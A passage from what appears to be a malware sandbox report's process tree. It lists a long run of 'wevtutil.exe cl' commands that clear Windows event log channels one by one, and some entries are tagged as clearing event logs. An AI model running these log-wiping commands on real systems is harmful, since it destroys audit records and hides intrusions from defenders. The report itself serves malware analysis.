wevtutil.exe cl "Microsoft-Windows-ASN1/Operational"
3⤵
PID:5096

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ATAPort/General"
3⤵
PID:4532

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ATAPort/SATA-LPM"
3⤵
PID:1032

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ActionQueue/Analytic"
3⤵
PID:4680

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-All-User-Install-Agent/Admin"
3⤵
- Clears Windows event logs
PID:4344

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AllJoyn/Debug"
3⤵
PID:956

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AllJoyn/Operational"
3⤵
PID:3484

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppHost/Admin"
3⤵
PID:3212

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppHost/ApplicationTracing"
3⤵
PID:1700

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppHost/Diagnostic"
3⤵
PID:4376

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppHost/Internal"
3⤵
PID:4864

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppID/Operational"
3⤵
- Clears Windows event logs
PID:1460

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"
3⤵
PID:3524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"
3⤵
PID:4048

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppLocker/Packaged app-Deployment"
3⤵
PID:4852

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppLocker/Packaged app-Execution"
3⤵
PID:524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Admin"
3⤵
PID:1436

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Analytic"
3⤵
PID:1132

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Debug"
3⤵
- Clears Windows event logs
PID:4160

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Diagnostics"
3⤵
PID:4576

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppModel-State/Debug"
3⤵
PID:4252

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppModel-State/Diagnostic"
3⤵
PID:1584

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppReadiness/Admin"
3⤵
PID:4580

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppReadiness/Debug"
3⤵
PID:3432

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppReadiness/Operational"
3⤵
PID:3568

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppSruProv"
3⤵
PID:4100

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppXDeployment/Diagnostic"
3⤵
PID:3204

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppXDeployment/Operational"
3⤵
PID:4920

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Debug"
3⤵
PID:1216

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Diagnostic"
3⤵
PID:1992

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Operational"
3⤵
PID:3216

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Restricted"
3⤵
PID:568

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ApplicabilityEngine/Analytic"
3⤵
PID:2528

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ApplicabilityEngine/Operational"
3⤵
- Clears Windows event logs
PID:4320

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Admin"
3⤵
PID:1728

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Analytic"
3⤵
PID:2580

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Debug"
3⤵
PID:216

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Operational"
3⤵
PID:3536

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Compatibility-Infrastructure-Debug"
3⤵
PID:2668

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"
3⤵
PID:220

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Analytic"
3⤵
PID:1068

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Trace"
3⤵
PID:2556

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"
3⤵
PID:4432

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"
3⤵
PID:3712

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Telemetry"
3⤵
PID:4832

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Steps-Recorder"
3⤵
PID:2308

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Debug"
3⤵
PID:3992

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Operational"
3⤵
PID:732

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Performance"
3⤵
PID:264

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AssignedAccess/Admin"
3⤵
PID:2608

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AssignedAccess/Operational"
3⤵
PID:284

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AssignedAccessBroker/Admin"
3⤵
PID:272

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AssignedAccessBroker/Operational"
3⤵
PID:528

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AsynchronousCausality/Causality"
3⤵
PID:296

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/CaptureMonitor"
3⤵
PID:3164

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/GlitchDetection"
3⤵
PID:1412

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/Informational"
3⤵
PID:4412

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/Operational"
3⤵
PID:4408

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/Performance"
3⤵
PID:3064

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/PlaybackManager"
3⤵
PID:3468

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audit/Analytic"
3⤵
PID:212

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Authentication User Interface/Operational"
3⤵
PID:2244

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Authentication/AuthenticationPolicyFailures-DomainController"
3⤵
PID:1480

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUser-Client"
3⤵
PID:2568

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUserFailures-DomainController"
3⤵
PID:4220

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUserSuccesses-DomainController"
3⤵
PID:4212

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AxInstallService/Log"
3⤵
PID:3908

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BTH-BTHPORT/HCI"
3⤵
PID:1768

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BTH-BTHPORT/L2CAP"
3⤵
PID:5016

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BTH-BTHUSB/Diagnostic"
3⤵
PID:3312

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BTH-BTHUSB/Performance"
3⤵
PID:3736

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic"
3⤵
PID:4744

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BackgroundTaskInfrastructure/Operational"
3⤵
PID:2516

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BackgroundTransfer-ContentPrefetcher/Operational"
3⤵
PID:3284

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Backup"
3⤵
- Clears Windows event logs
PID:3360

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Base-Filtering-Engine-Connections/Operational"
3⤵
PID:2368

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Base-Filtering-Engine-Resource-Flows/Operational"
3⤵
PID:4904

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Battery/Diagnostic"
3⤵
PID:4944

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Biometrics/Analytic"
3⤵
PID:3200

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Biometrics/Operational"
3⤵
PID:4164

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"
3⤵
PID:3912

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"
3⤵
PID:5020

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BitLocker-Driver-Performance/Operational"
3⤵
PID:4928

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BitLocker/BitLocker Management"
3⤵
PID:1304

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BitLocker/BitLocker Operational"
3⤵
PID:3904

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BitLocker/Tracing"
3⤵
PID:4772

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Bits-Client/Analytic"
3⤵
PID:5056

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Bits-Client/Operational"
3⤵
PID:4888

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Bluetooth-BthLEPrepairing/Operational"
3⤵
PID:2380

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Bluetooth-Bthmini/Operational"
3⤵
PID:1376

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Bluetooth-MTPEnum/Operational"
3⤵
PID:1440

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Bluetooth-Policy/Operational"
3⤵
PID:1160

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCache/Operational"
3⤵
PID:3280

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"
3⤵
PID:4916

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"
3⤵
PID:4652

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheMonitoring/Analytic"
3⤵
PID:376

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Analytic"
3⤵
PID:2376

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Operational"
3⤵
PID:4460

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CAPI2/Catalog Database Debug"
3⤵
- Clears Windows event logs
PID:3384

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CAPI2/Operational"
3⤵
PID:4256

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CDROM/Operational"
3⤵
PID:1700

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COM/Analytic"
3⤵
PID:4376

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COM/ApartmentInitialize"
3⤵
PID:4864

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COM/ApartmentUninitialize"
3⤵
PID:1460

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COM/Call"
3⤵
PID:3524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COM/CreateInstance"
3⤵
PID:4048

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COM/ExtensionCatalog"
3⤵
PID:4372

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COM/FreeUnusedLibrary"
3⤵
PID:4860

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COM/RundownInstrumentation"
3⤵
PID:1812

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COMRuntime/Activations"
3⤵
PID:5104

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COMRuntime/MessageProcessing"
3⤵
PID:788

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COMRuntime/Tracing"
3⤵
PID:1756

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CertPoleEng/Operational"
3⤵
PID:1060

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"
3⤵
PID:1172

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-Lifecycle-System/Operational"
3⤵
PID:2316

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-Lifecycle-User/Operational"
3⤵
PID:3432

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Cleanmgr/Diagnostic"
3⤵
PID:1000

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"
3⤵
PID:1188

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CloudStore/Debug"
3⤵
PID:3204

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CloudStore/Operational"
3⤵
PID:4920

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CmiSetup/Analytic"
3⤵
PID:1216

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Operational"
3⤵
PID:1992

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Verbose"
3⤵
PID:3216

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ComDlg32/Analytic"
3⤵
- Clears Windows event logs
PID:568

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ComDlg32/Debug"
3⤵
PID:2528

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Compat-Appraiser/Analytic"
3⤵
PID:4320

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Compat-Appraiser/Operational"
3⤵
PID:1728

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Containers-BindFlt/Debug"
3⤵
PID:3128

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Containers-BindFlt/Operational"
3⤵
PID:3464

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Containers-Wcifs/Debug"
3⤵
PID:932

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Containers-Wcifs/Operational"
3⤵
PID:920

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Containers-Wcnfs/Debug"
3⤵
PID:4676

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Containers-Wcnfs/Operational"
3⤵
PID:3896

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CoreApplication/Diagnostic"
3⤵
PID:3672

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CoreApplication/Operational"
3⤵
PID:4628

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CoreApplication/Tracing"
3⤵
PID:2088

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CoreSystem-SmsRouter-Events/Debug"
3⤵
PID:3756

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CoreSystem-SmsRouter-Events/Operational"
3⤵
PID:1912

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CoreWindow/Analytic"
3⤵
PID:2716

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CoreWindow/Debug"
3⤵
PID:2024

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"
3⤵
PID:4332

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"
3⤵
PID:1484

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crashdump/Operational"
3⤵
PID:280

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CredUI/Diagnostic"
3⤵
PID:1144

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-BCRYPT/Analytic"
3⤵
PID:260

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-CNG/Analytic"
3⤵
PID:3448

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/BackUpKeySvc"
3⤵
PID:3272

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/Debug"
3⤵
PID:1656

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/Operational"
3⤵
PID:364

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-DSSEnh/Analytic"
3⤵
PID:3668

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-NCrypt/Operational"
3⤵
PID:2272

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-RNG/Analytic"
3⤵
PID:1772

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-RSAEnh/Analytic"
3⤵
PID:4936

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-D3D10Level9/Analytic"
3⤵
PID:3680

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-D3D10Level9/PerfTiming"
3⤵
PID:3016

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DAL-Provider/Analytic"
3⤵
PID:1868

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DAL-Provider/Operational"
3⤵
PID:3436

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DAMM/Diagnostic"
3⤵
PID:3456

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DCLocator/Debug"
3⤵
PID:1844

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DDisplay/Analytic"
3⤵
PID:2664

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DDisplay/Logging"
3⤵
PID:2256

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DLNA-Namespace/Analytic"
3⤵
PID:2288

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DNS-Client/Operational"
3⤵
PID:3664

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DSC/Admin"
3⤵
PID:1552

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DSC/Analytic"
3⤵
PID:3864

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DSC/Debug"
3⤵
PID:3884

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DSC/Operational"
3⤵
PID:2988

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DUI/Diagnostic"
3⤵
PID:4504

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DUSER/Diagnostic"
3⤵
PID:444

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DXGI/Analytic"
3⤵
PID:5024

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DXGI/Logging"
3⤵
PID:3968

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DXP/Analytic"
3⤵
PID:2820

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Data-Pdf/Debug"
3⤵
PID:1156

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DataIntegrityScan/Admin"
3⤵
PID:4228

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DataIntegrityScan/CrashRecovery"
3⤵
PID:4496

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Analytic"
3⤵
PID:5092

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Debug"
3⤵
PID:784

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Operational"
3⤵
PID:1684

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Deduplication/Diagnostic"
3⤵
PID:2344

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Deduplication/Operational"
3⤵
PID:4876

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Deduplication/Performance"
3⤵
PID:4788

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Deduplication/Scrubbing"
3⤵
PID:1420

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Defrag-Core/Debug"
3⤵
PID:1128

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Deplorch/Analytic"
3⤵
PID:1256

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DesktopActivityModerator/Diagnostic"
3⤵
PID:4428

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DesktopWindowManager-Diag/Diagnostic"
3⤵
PID:936

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceAssociationService/Performance"
3⤵
PID:4916

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceConfidence/Analytic"
3⤵
- Clears Windows event logs
PID:4652

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceGuard/Operational"
3⤵
PID:376

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceGuard/Verbose"
3⤵
PID:2376

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Admin"
3⤵
PID:4460

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Debug"
3⤵
PID:3384

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Operational"
3⤵
PID:4256

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Admin"
3⤵
PID:1700

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Analytic"
3⤵
PID:4376

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Debug"
3⤵
PID:4864

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Operational"
3⤵
PID:4508

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceSync/Analytic"
3⤵
PID:3524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceSync/Operational"
3⤵
PID:5052

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceUpdateAgent/Operational"
3⤵
PID:4328

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceUx/Informational"
3⤵
PID:4860

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceUx/Performance"
3⤵
PID:1812

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Devices-Background/Operational"
3⤵
PID:5104

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Admin"
3⤵
PID:788

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Operational"
3⤵
PID:1756

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Admin"
3⤵
PID:1060

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Operational"
3⤵
- Clears Windows event logs
PID:1172

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DiagCpl/Debug"
3⤵
PID:2316

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-AdvancedTaskManager/Analytic"
3⤵
PID:3432

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Analytic"
3⤵
PID:1000

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Debug"
3⤵
PID:4100

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Operational"
3⤵
PID:2732

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-MSDE/Debug"
3⤵
PID:1904

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Analytic"
3⤵
PID:4348

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Debug"
3⤵
PID:744

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Operational"
3⤵
- Clears Windows event logs
PID:2188

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Debug"
3⤵
PID:4732

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Operational"
3⤵
PID:640

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Perfhost/Analytic"
3⤵
PID:4552

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scheduled/Operational"
3⤵
PID:4288

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Admin"
3⤵
PID:1316

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Analytic"
3⤵
PID:2688

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Debug"
3⤵
PID:4292

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Operational"
3⤵
PID:3892

C:\Windows\system32\wevtutil.exe
